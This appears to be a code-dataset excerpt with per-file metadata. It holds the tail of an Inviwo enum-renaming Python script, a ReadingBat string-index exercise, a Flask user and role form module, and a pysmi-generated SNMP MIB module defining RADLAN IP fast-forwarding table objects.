"DataFLOAT64" : "DataFloat64",
"DataINT8" : "DataInt8",
"DataINT16" : "DataInt16",
"DataINT32" : "DataInt32",
"DataINT64" : "DataInt64",
"DataUINT8" : "DataUInt8",
"DataUINT16" : "DataUInt16",
"DataUINT32" : "DataUInt32",
"DataUINT64" : "DataUInt64",
"DataVec2FLOAT16" : "DataVec2Float16",
"DataVec2FLOAT32" : "DataVec2Float32",
"DataVec2FLOAT64" : "DataVec2Float64",
"DataVec2INT8" : "DataVec2Int8",
"DataVec2INT16" : "DataVec2Int16",
"DataVec2INT32" : "DataVec2Int32",
"DataVec2INT64" : "DataVec2Int64",
"DataVec2UINT8" : "DataVec2UInt8",
"DataVec2UINT16" : "DataVec2UInt16",
"DataVec2UINT32" : "DataVec2UInt32",
"DataVec2UINT64" : "DataVec2UInt64",
"DataVec3FLOAT16" : "DataVec3Float16",
"DataVec3FLOAT32" : "DataVec3Float32",
"DataVec3FLOAT64" : "DataVec3Float64",
"DataVec3INT8" : "DataVec3Int8",
"DataVec3INT16" : "DataVec3Int16",
"DataVec3INT32" : "DataVec3Int32",
"DataVec3INT64" : "DataVec3Int64",
"DataVec3UINT8" : "DataVec3UInt8",
"DataVec3UINT16" : "DataVec3UInt16",
"DataVec3UINT32" : "DataVec3UInt32",
"DataVec3UINT64" : "DataVec3UInt64",
"DataVec4FLOAT16" : "DataVec4Float16",
"DataVec4FLOAT32" : "DataVec4Float32",
"DataVec4FLOAT64" : "DataVec4Float64",
"DataVec4INT8" : "DataVec4Int8",
"DataVec4INT16" : "DataVec4Int16",
"DataVec4INT32" : "DataVec4Int32",
"DataVec4INT64" : "DataVec4Int64",
"DataVec4UINT8" : "DataVec4UInt8",
"DataVec4UINT16" : "DataVec4UInt16",
"DataVec4UINT32" : "DataVec4UInt32",
"DataVec4UINT64" : "DataVec4UInt64",
}
ShadingFunctionReplacements = {
"ShadingFunctionEnum::Enum" : "ShadingFunctionKind",
"ShadingFunctionEnum::HENYEY_GREENSTEIN" : "ShadingFunctionKind::HenyeyGreenstein",
"ShadingFunctionEnum::SCHLICK" : "ShadingFunctionKind::Schlick",
"ShadingFunctionEnum::BLINN_PHONG" : "ShadingFunctionKind::BlinnPhong",
"ShadingFunctionEnum::WARD" : "ShadingFunctionKind::Ward",
"ShadingFunctionEnum::COOK_TORRANCE" : "ShadingFunctionKind::CookTorrance",
"ShadingFunctionEnum::ABC_MICROFACET" : "ShadingFunctionKind::AbcMicrofacet",
"ShadingFunctionEnum::ASHIKHMIN" : "ShadingFunctionKind::Ashikhmin",
"ShadingFunctionEnum::MIX" : "ShadingFunctionKind::Mix",
"ShadingFunctionEnum::ISOTROPIC" : "ShadingFunctionKind::Isotropic"
}
usageModeReplacements = {
"APPLICATION" : "UsageMode::Application",
"DEVELOPMENT" : "UsageMode::Development"
}
drawModeReplacements = {
"DrawMode::NOT_SPECIFIED" : "DrawMode::NotSpecified",
"DrawMode::POINTS" : "DrawMode::Points",
"DrawMode::LINES" : "DrawMode::Lines",
"DrawMode::LINE_STRIP" : "DrawMode::LineStrip",
"DrawMode::LINE_LOOP" : "DrawMode::LineLoop",
"DrawMode::LINES_ADJACENCY" : "DrawMode::LinesAdjacency",
"DrawMode::LINE_STRIP_ADJACENCY" : "DrawMode::LineStripAdjacency",
"DrawMode::TRIANGLES" : "DrawMode::Triangles",
"DrawMode::TRIANGLE_STRIP" : "DrawMode::TriangleStrip",
"DrawMode::TRIANGLE_FAN" : "DrawMode::TriangleFan",
"DrawMode::TRIANGLES_ADJACENCY" : "DrawMode::TrianglesAdjacency",
"DrawMode::TRIANGLE_STRIP_ADJACENCY" : "DrawMode::TriangleStripAdjacency",
"DrawMode::NUMBER_OF_DRAW_MODES" : "DrawMode::NumberOfDrawModes"
}
interactionEventTypeReplacements = {
"NONE_SUPPORTED" : "InteractionEventType::NoneSupported",
"MOUSE_INTERACTION_EVENT" : "InteractionEventType::MouseInteraction",
"TOUCH_INTERACTION_EVENT" : "InteractionEventType::TouchInteraction"
}
glVendorReplacements = {
"VENDOR_NVIDIA" : "GlVendor::Nvidia",
"VENDOR_AMD" : "GlVendor::Amd",
"VENDOR_INTEL" : "GlVendor::Intel",
"VENDOR_UNKNOWN" : "GlVendor::Unknown"
}
gLFormatsNormalizationReplacements = {
"GLFormats::NONE": "GLFormats::Normalization::None",
"GLFormats::NORMALIZED": "GLFormats::Normalization::Normalized",
"GLFormats::SIGN_NORMALIZED": "GLFormats::Normalization::SignNormalized"
}
cLFormatsNormalizationReplacements = {
"CLFormats::NONE": "CLFormats::Normalization::None",
"CLFormats::NORMALIZED": "CLFormats::Normalization::Normalized",
"CLFormats::SIGN_NORMALIZED": "CLFormats::Normalization::SignNormalized"
}
invalidationLevelReplacements = {
"VALID" : "InvalidationLevel::Valid",
"INVALID_OUTPUT" : "InvalidationLevel::InvalidOutput",
"INVALID_RESOURCES" : "InvalidationLevel::InvalidResources"
}
pathTypeReplacements = {
"InviwoApplication::PathType" : "PathType",
"InviwoApplication::PATH_DATA" : "PathType::Data",
"InviwoApplication::PATH_VOLUMES" : "PathType::Volumes",
"InviwoApplication::PATH_MODULES" : "PathType::Modules",
"InviwoApplication::PATH_WORKSPACES" : "PathType::Workspaces",
"InviwoApplication::PATH_SCRIPTS" : "PathType::Scripts",
"InviwoApplication::PATH_PORTINSPECTORS" : "PathType::PortInspectors",
"InviwoApplication::PATH_IMAGES" : "PathType::Images",
"InviwoApplication::PATH_DATABASES" : "PathType::Databases",
"InviwoApplication::PATH_RESOURCES" : "PathType::Resources",
"InviwoApplication::PATH_TRANSFERFUNCTIONS" : "PathType::TransferFunctions",
"InviwoApplication::PATH_SETTINGS" : "PathType::Settings",
"InviwoApplication::PATH_HELP" : "PathType::Help"
}
geometryTypeReplacements = {
"BufferType::POSITION_ATTRIB" : "BufferType::PositionAttrib",
"BufferType::NORMAL_ATTRIB" : "BufferType::NormalAttrib",
"BufferType::COLOR_ATTRIB" : "BufferType::ColorAttrib",
"BufferType::TEXCOORD_ATTRIB" : "BufferType::TexcoordAttrib",
"BufferType::CURVATURE_ATTRIB" : "BufferType::CurvatureAttrib",
"BufferType::INDEX_ATTRIB" : "BufferType::IndexAttrib",
"BufferType::NUMBER_OF_BUFFER_TYPES" : "BufferType::NumberOfBufferTypes",
"BufferUsage::STATIC" : "BufferUsage::Static",
"BufferUsage::DYNAMIC" : "BufferUsage::Dynamic",
"DrawType::NOT_SPECIFIED" : "DrawType::NotSpecified",
"DrawType::POINTS" : "DrawType::Points",
"DrawType::LINES" : "DrawType::Lines",
"DrawType::TRIANGLES" : "DrawType::Triangles",
"DrawType::NUMBER_OF_DRAW_TYPES" : "DrawType::NumberOfDrawTypes",
"ConnectivityType::NONE" : "ConnectivityType::None",
"ConnectivityType::STRIP" : "ConnectivityType::Strip",
"ConnectivityType::LOOP" : "ConnectivityType::Loop",
"ConnectivityType::FAN" : "ConnectivityType::Fan",
"ConnectivityType::ADJACENCY" : "ConnectivityType::Adjacency",
"ConnectivityType::STRIP_ADJACENCY" : "ConnectivityType::StripAdjacency",
"ConnectivityType::NUMBER_OF_CONNECTIVITY_TYPES" : "ConnectivityType::NumberOfConnectivityTypes",
}
propertySerializationModeReplacements = {
"PropertySerializationMode::DEFAULT" : "PropertySerializationMode::Default",
"PropertySerializationMode::ALL" : "PropertySerializationMode::All",
"PropertySerializationMode::NONE" : "PropertySerializationMode::None"
}
eventReplacements = {
"MouseEvent::MOUSE_BUTTON_NONE" : "MouseButton::None",
"MouseEvent::MOUSE_BUTTON_LEFT" : "MouseButton::Left",
"MouseEvent::MOUSE_BUTTON_MIDDLE" : "MouseButton::Middle",
"MouseEvent::MOUSE_BUTTON_RIGHT" : "MouseButton::Right",
"MouseEvent::MOUSE_STATE_NONE" : "MouseState::None",
"MouseEvent::MOUSE_STATE_MOVE" : "MouseState::Move",
"MouseEvent::MOUSE_STATE_PRESS" : "MouseState::Press",
"MouseEvent::MOUSE_STATE_RELEASE" : "MouseState::Release",
"MouseEvent::MOUSE_STATE_DOUBLE_CLICK" : "MouseState::DoubleClick",
"KeyboardEvent::KEY_STATE_PRESS" : "KeyState::Press",
"KeyboardEvent::KEY_STATE_RELEASE" : "KeyState::Release",
"TouchPoint::TOUCH_STATE_NONE" : "TouchState::None",
"TouchPoint::TOUCH_STATE_STARTED" : "TouchState::Started",
"TouchPoint::TOUCH_STATE_UPDATED" : "TouchState::Updated",
"TouchPoint::TOUCH_STATE_STATIONARY" : "TouchState::Stationary",
"TouchPoint::TOUCH_STATE_ENDED" : "TouchState::Finished",
"GestureEvent::PAN" : "GestureType::Pan",
"GestureEvent::PINCH" : "GestureType::Pinch",
"GestureEvent::SWIPE" : "GestureType::Swipe",
"GestureEvent::GESTURE_STATE_NONE" : "GestureState::None",
"GestureEvent::GESTURE_STATE_STARTED" : "GestureState::Started",
"GestureEvent::GESTURE_STATE_UPDATED" : "GestureState::Updated",
"GestureEvent::GESTURE_STATE_ENDED" : "GestureState::Finished",
"GestureEvent::GESTURE_STATE_CANCELED" : "GestureState::Canceled",
"InteractionEvent::MODIFIER_NONE" : "KeyModifier::None",
"InteractionEvent::MODIFIER_ALT" : "KeyModifier::Alt",
"InteractionEvent::MODIFIER_CTRL" : "KeyModifier::Control",
"InteractionEvent::MODIFIER_SHIFT" : "KeyModifier::Shift"
}
print("Looking in " + str(len(files)) + " files")
# order matters here...
# for k,v in numericTypeReplacements.items():
# replace(k,v)
# for k,v in dataFormatIdReplacements.items():
# replace(k,v)
# for k,v in dataFormatTypeReplacements.items():
# replace(k,v)
# for k,v in ShadingFunctionReplacements.items():
# replace(k,v)
# for k,v in usageModeReplacements.items():
# replace(r"\b"+k+r"\b", v)
# for k,v in drawModeReplacements.items():
# replace(r"\b"+k+r"\b", v)
# for k,v in interactionEventTypeReplacements.items():
# replace(r"\b"+k+r"\b", v)
# for k,v in glVendorReplacements.items():
# replace(r"\b"+k+r"\b", v)
# for k,v in gLFormatsNormalizationReplacements.items():
# replace(r"\b"+k+r"\b", v)
# for k,v in cLFormatsNormalizationReplacements.items():
# replace(r"\b"+k+r"\b", v)
# for k,v in invalidationLevelReplacements.items():
# replace(r"\b"+k+r"\b", v)
#for k,v in pathTypeReplacements.items():
# replace(r"\b"+k+r"\b", v)
#for k,v in geometryTypeReplacements.items():
# replace(r"\b"+k+r"\b", v)
#for k,v in propertySerializationModeReplacements.items():
# replace(r"\b"+k+r"\b", v)
for k, v in eventReplacements.items():
    replace(r"\b" + k + r"\b", v)
| 41.803468 | 128 | 0.69628 | 1,127 | 14,464 | 8.828749 | 0.301686 | 0.004422 | 0.007538 | 0.010553 | 0.051457 | 0.051457 | 0.045628 | 0.045628 | 0.025126 | 0.025126 | 0 | 0.037055 | 0.147331 | 14,464 | 345 | 129 | 41.924638 | 0.769724 | 0.08096 | 0 | 0 | 0 | 0 | 0.691437 | 0.490155 | 0 | 0 | 0 | 0 | 0 | 1 | 0.003953 | false | 0 | 0.019763 | 0 | 0.023715 | 0.01581 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
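The enumfixes.py record above wraps each old enum name in `\b` word boundaries before substituting, so a short name such as `VALID` cannot match inside a longer one such as `INVALID_OUTPUT` (hence the "order matters here" comment). A self-contained sketch of that pattern, using a two-entry subset of its `invalidationLevelReplacements` table:

```python
import re

# Subset of the replacement table from the record above.
replacements = {
    "VALID": "InvalidationLevel::Valid",
    "INVALID_OUTPUT": "InvalidationLevel::InvalidOutput",
}

text = "return VALID; // not INVALID_OUTPUT"
for old, new in replacements.items():
    # \b requires a non-word char on each side, so "VALID" inside
    # "INVALID_OUTPUT" (preceded by "N") is left untouched.
    text = re.sub(r"\b" + re.escape(old) + r"\b", new, text)

print(text)  # return InvalidationLevel::Valid; // not InvalidationLevel::InvalidOutput
```

`re.escape` is an addition here for safety with keys containing regex metacharacters; the original script concatenates the raw key, which is fine for plain identifiers.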
83d086cbd02d179d44c2730f1cb8af9ee1a592f2 | 516 | py | Python | python/string_ops/combine2.py | readingbat/readingbat-python-content | 437648be8e15ce3ce21d5f256f91d71658bbb889 | [
"Apache-2.0"
] | null | null | null | python/string_ops/combine2.py | readingbat/readingbat-python-content | 437648be8e15ce3ce21d5f256f91d71658bbb889 | [
"Apache-2.0"
] | null | null | null | python/string_ops/combine2.py | readingbat/readingbat-python-content | 437648be8e15ce3ce21d5f256f91d71658bbb889 | [
"Apache-2.0"
] | null | null | null | # @desc The 2nd character in a string is at index 1.
def combine2(s1, s2):
    s3 = s1[1]
    s4 = s2[1]
    result = s3 + s4
    return result


def main():
    print(combine2('Car', 'wash'))
    print(combine2(' Hello', ' world'))
    print(combine2('55', '88'))
    print(combine2('Snow', 'ball'))
    print(combine2('Rain', 'boots'))
    print(combine2('Reading', 'bat'))
    print(combine2('AA', 'HI'))
    print(combine2('Hi', 'there'))
    print(combine2('  ', '  '))


if __name__ == '__main__':
    main()
# --- pertemuan_9/4_Final_App/app/forms/user.py (repo: Muhammad-Yunus/Flask-Web-Development, license: Apache-2.0) ---
from . import datetime
from . import FlaskForm
from . import BooleanField, StringField, TextAreaField, \
    IntegerField, SelectMultipleField, PasswordField, \
    validators, SubmitField, DateTimeField


class UserForm(FlaskForm):
    id = IntegerField(default=0)
    name = StringField('Name', [validators.Length(min=4, max=255), validators.DataRequired()])
    email = StringField('Email Address', [validators.Length(min=6, max=255), validators.DataRequired()])
    phone = StringField('Phone Number', [validators.Length(min=8, max=14)])
    role = SelectMultipleField('Role', coerce=int, default=[1])
    active = BooleanField('Is Active ?')
    confirmed_at = DateTimeField('Confirmed at', format="%Y-%m-%d %H:%M:%S", default=datetime.today)
    submit = SubmitField('Submit')


class RoleForm(FlaskForm):
    id = IntegerField(default=0)
    name = StringField('Name', [validators.Length(min=4, max=80), validators.DataRequired()])
    description = TextAreaField('Description', default='', render_kw={'rows': 5})
    submit = SubmitField('Submit')
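The forms above lean on WTForms-style validator lists. A framework-free sketch of that pattern (all names here are illustrative, not the actual WTForms API): each field runs an ordered list of callables and collects the error messages instead of raising.

```python
class Length:
    # Validator: value's length must fall within [min, max].
    def __init__(self, min=0, max=None):
        self.min, self.max = min, max

    def __call__(self, value):
        if len(value) < self.min or (self.max is not None and len(value) > self.max):
            raise ValueError(f'length must be {self.min}..{self.max}')


class DataRequired:
    # Validator: value must be non-empty.
    def __call__(self, value):
        if not value:
            raise ValueError('this field is required')


def run_validators(value, validator_list):
    # Run each validator in order, collecting error messages.
    errors = []
    for v in validator_list:
        try:
            v(value)
        except ValueError as exc:
            errors.append(str(exc))
    return errors
```

Mirroring the `name` field above, `run_validators('Bob', [Length(min=4, max=255), DataRequired()])` reports a length error, while a long-enough name passes cleanly.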
# --- pysnmp/RADLAN-rlFft.py (repo: agustinhenze/mibs.snmplabs.com, license: Apache-2.0) ---
#
# PySNMP MIB module RADLAN-rlFft (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/RADLAN-rlFft
# Produced by pysmi-0.3.4 at Mon Apr 29 20:42:31 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
Integer, OctetString, ObjectIdentifier = mibBuilder.importSymbols("ASN1", "Integer", "OctetString", "ObjectIdentifier")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
ValueSizeConstraint, SingleValueConstraint, ValueRangeConstraint, ConstraintsIntersection, ConstraintsUnion = mibBuilder.importSymbols("ASN1-REFINEMENT", "ValueSizeConstraint", "SingleValueConstraint", "ValueRangeConstraint", "ConstraintsIntersection", "ConstraintsUnion")
rnd, = mibBuilder.importSymbols("RADLAN-MIB", "rnd")
NotificationGroup, ModuleCompliance = mibBuilder.importSymbols("SNMPv2-CONF", "NotificationGroup", "ModuleCompliance")
iso, MibScalar, MibTable, MibTableRow, MibTableColumn, MibIdentifier, Counter32, TimeTicks, NotificationType, Bits, ObjectIdentity, Integer32, ModuleIdentity, Gauge32, Counter64, Unsigned32, IpAddress = mibBuilder.importSymbols("SNMPv2-SMI", "iso", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "MibIdentifier", "Counter32", "TimeTicks", "NotificationType", "Bits", "ObjectIdentity", "Integer32", "ModuleIdentity", "Gauge32", "Counter64", "Unsigned32", "IpAddress")
TextualConvention, TruthValue, RowStatus, PhysAddress, DisplayString = mibBuilder.importSymbols("SNMPv2-TC", "TextualConvention", "TruthValue", "RowStatus", "PhysAddress", "DisplayString")
class Percents(TextualConvention, Integer32):
    status = 'current'
    subtypeSpec = Integer32.subtypeSpec + ValueRangeConstraint(0, 100)


class NetNumber(TextualConvention, OctetString):
    status = 'current'
    subtypeSpec = OctetString.subtypeSpec + ValueSizeConstraint(4, 4)
    fixedLength = 4
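A framework-free sketch of what these two textual conventions enforce — an integer range for `Percents` and a fixed four-octet length for `NetNumber`. The checker function names are hypothetical, not pysnmp API:

```python
def check_percents(value):
    # Percents: an Integer32 restricted to the range 0..100.
    if not 0 <= value <= 100:
        raise ValueError('Percents must be in 0..100')
    return value


def check_net_number(octets):
    # NetNumber: an OctetString fixed at exactly 4 octets.
    if len(octets) != 4:
        raise ValueError('NetNumber must be exactly 4 octets')
    return octets
```

An agent applying these conventions would reject, say, a 101% boundary value or a 3-byte network number before it ever reaches the MIB instrumentation.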
rlFFT = ModuleIdentity((1, 3, 6, 1, 4, 1, 89, 47))
rlFFT.setRevisions(('2004-06-01 00:00',))
if mibBuilder.loadTexts: rlFFT.setLastUpdated('200406010000Z')
if mibBuilder.loadTexts: rlFFT.setOrganization('')
rlIpFFT = MibIdentifier((1, 3, 6, 1, 4, 1, 89, 47, 1))
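Every object below is registered under a tuple OID rooted at `(1, 3, 6, 1, 4, 1, 89, 47)`. A small stdlib-only helper (hypothetical, not part of this module) that renders such tuples in the dotted notation SNMP tools display:

```python
def oid_to_str(oid):
    # Render an OID tuple as a dotted-decimal string.
    return '.'.join(str(arc) for arc in oid)

RL_FFT = (1, 3, 6, 1, 4, 1, 89, 47)      # rlFFT module root
RL_IP_FFT = RL_FFT + (1,)                # rlIpFFT subtree
```

With these names, `oid_to_str(RL_IP_FFT)` yields `'1.3.6.1.4.1.89.47.1'`, matching the `rlIpFFT` identifier above.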
rlIpFftMibVersion = MibScalar((1, 3, 6, 1, 4, 1, 89, 47, 1, 1), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpFftMibVersion.setStatus('current')
rlIpMaxFftNumber = MibScalar((1, 3, 6, 1, 4, 1, 89, 47, 1, 2), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpMaxFftNumber.setStatus('current')
rlIpFftDynamicSupported = MibScalar((1, 3, 6, 1, 4, 1, 89, 47, 1, 3), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("supported", 1), ("unsupported", 2)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpFftDynamicSupported.setStatus('current')
rlIpFftSubnetSupported = MibScalar((1, 3, 6, 1, 4, 1, 89, 47, 1, 4), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("supported", 1), ("unsupported", 2)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpFftSubnetSupported.setStatus('current')
rlIpFftUnknownAddrMsgUsed = MibScalar((1, 3, 6, 1, 4, 1, 89, 47, 1, 5), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("used", 1), ("unused", 2)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpFftUnknownAddrMsgUsed.setStatus('current')
rlIpFftAgingTimeSupported = MibScalar((1, 3, 6, 1, 4, 1, 89, 47, 1, 6), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("supported", 1), ("unsupported", 2)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpFftAgingTimeSupported.setStatus('current')
rlIpFftSrcAddrSupported = MibScalar((1, 3, 6, 1, 4, 1, 89, 47, 1, 7), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("supported", 1), ("unsupported", 2)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpFftSrcAddrSupported.setStatus('current')
rlIpFftAgingTimeout = MibScalar((1, 3, 6, 1, 4, 1, 89, 47, 1, 8), Integer32()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: rlIpFftAgingTimeout.setStatus('current')
rlIpFftRedBoundary = MibScalar((1, 3, 6, 1, 4, 1, 89, 47, 1, 9), Percents()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: rlIpFftRedBoundary.setStatus('current')
rlIpFftYellowBoundary = MibScalar((1, 3, 6, 1, 4, 1, 89, 47, 1, 10), Percents()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: rlIpFftYellowBoundary.setStatus('current')
rlIpFftNumTable = MibTable((1, 3, 6, 1, 4, 1, 89, 47, 1, 12), )
if mibBuilder.loadTexts: rlIpFftNumTable.setStatus('current')
rlIpFftNumEntry = MibTableRow((1, 3, 6, 1, 4, 1, 89, 47, 1, 12, 1), ).setIndexNames((0, "RADLAN-rlFft", "rlIpFftNumIndex"))
if mibBuilder.loadTexts: rlIpFftNumEntry.setStatus('current')
rlIpFftNumIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 1, 12, 1, 1), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpFftNumIndex.setStatus('current')
rlIpFftNumStnRoutesNumber = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 1, 12, 1, 2), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpFftNumStnRoutesNumber.setStatus('current')
rlIpFftNumSubRoutesNumber = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 1, 12, 1, 3), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpFftNumSubRoutesNumber.setStatus('current')
rlIpFftStnTable = MibTable((1, 3, 6, 1, 4, 1, 89, 47, 1, 13), )
if mibBuilder.loadTexts: rlIpFftStnTable.setStatus('current')
rlIpFftStnEntry = MibTableRow((1, 3, 6, 1, 4, 1, 89, 47, 1, 13, 1), ).setIndexNames((0, "RADLAN-rlFft", "rlIpFftStnIndex"), (0, "RADLAN-rlFft", "rlIpFftStnMrid"), (0, "RADLAN-rlFft", "rlIpFftStnDstIpAddress"))
if mibBuilder.loadTexts: rlIpFftStnEntry.setStatus('current')
rlIpFftStnIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 1, 13, 1, 1), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpFftStnIndex.setStatus('current')
rlIpFftStnMrid = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 1, 13, 1, 2), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpFftStnMrid.setStatus('current')
rlIpFftStnDstIpAddress = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 1, 13, 1, 3), IpAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpFftStnDstIpAddress.setStatus('current')
rlIpFftStnDstRouteIpMask = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 1, 13, 1, 4), IpAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpFftStnDstRouteIpMask.setStatus('current')
rlIpFftStnDstIpAddrType = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 1, 13, 1, 5), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("local", 1), ("remote", 2)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpFftStnDstIpAddrType.setStatus('current')
rlIpFftStnDstMacAddress = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 1, 13, 1, 6), PhysAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpFftStnDstMacAddress.setStatus('current')
rlIpFftStnSrcMacAddress = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 1, 13, 1, 7), PhysAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpFftStnSrcMacAddress.setStatus('current')
rlIpFftStnOutIfIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 1, 13, 1, 8), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpFftStnOutIfIndex.setStatus('current')
rlIpFftStnVid = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 1, 13, 1, 9), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpFftStnVid.setStatus('current')
rlIpFftStnTaggedMode = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 1, 13, 1, 10), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("untagged", 1), ("tagged", 2), ("basedPortConfig", 3)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpFftStnTaggedMode.setStatus('current')
rlIpFftStnAge = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 1, 13, 1, 11), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpFftStnAge.setStatus('current')
rlIpFftSubTable = MibTable((1, 3, 6, 1, 4, 1, 89, 47, 1, 14), )
if mibBuilder.loadTexts: rlIpFftSubTable.setStatus('current')
rlIpFftSubEntry = MibTableRow((1, 3, 6, 1, 4, 1, 89, 47, 1, 14, 1), ).setIndexNames((0, "RADLAN-rlFft", "rlIpFftSubMrid"), (0, "RADLAN-rlFft", "rlIpFftSubDstIpSubnet"), (0, "RADLAN-rlFft", "rlIpFftSubDstIpMask"))
if mibBuilder.loadTexts: rlIpFftSubEntry.setStatus('current')
rlIpFftSubMrid = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 1, 14, 1, 1), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpFftSubMrid.setStatus('current')
rlIpFftSubDstIpSubnet = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 1, 14, 1, 2), IpAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpFftSubDstIpSubnet.setStatus('current')
rlIpFftSubDstIpMask = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 1, 14, 1, 3), IpAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpFftSubDstIpMask.setStatus('current')
rlIpFftSubAge = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 1, 14, 1, 4), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpFftSubAge.setStatus('current')
rlIpFftSubNextHopSetRefCount = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 1, 14, 1, 5), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpFftSubNextHopSetRefCount.setStatus('current')
rlIpFftSubNextHopCount = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 1, 14, 1, 6), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpFftSubNextHopCount.setStatus('current')
rlIpFftSubNextHopIfindex1 = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 1, 14, 1, 7), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpFftSubNextHopIfindex1.setStatus('current')
rlIpFftSubNextHopIpAddr1 = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 1, 14, 1, 8), IpAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpFftSubNextHopIpAddr1.setStatus('current')
rlIpFftSubNextHopIfindex2 = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 1, 14, 1, 9), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpFftSubNextHopIfindex2.setStatus('current')
rlIpFftSubNextHopIpAddr2 = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 1, 14, 1, 10), IpAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpFftSubNextHopIpAddr2.setStatus('current')
rlIpFftSubNextHopIfindex3 = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 1, 14, 1, 11), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpFftSubNextHopIfindex3.setStatus('current')
rlIpFftSubNextHopIpAddr3 = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 1, 14, 1, 12), IpAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpFftSubNextHopIpAddr3.setStatus('current')
rlIpFftSubNextHopIfindex4 = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 1, 14, 1, 13), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpFftSubNextHopIfindex4.setStatus('current')
rlIpFftSubNextHopIpAddr4 = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 1, 14, 1, 14), IpAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpFftSubNextHopIpAddr4.setStatus('current')
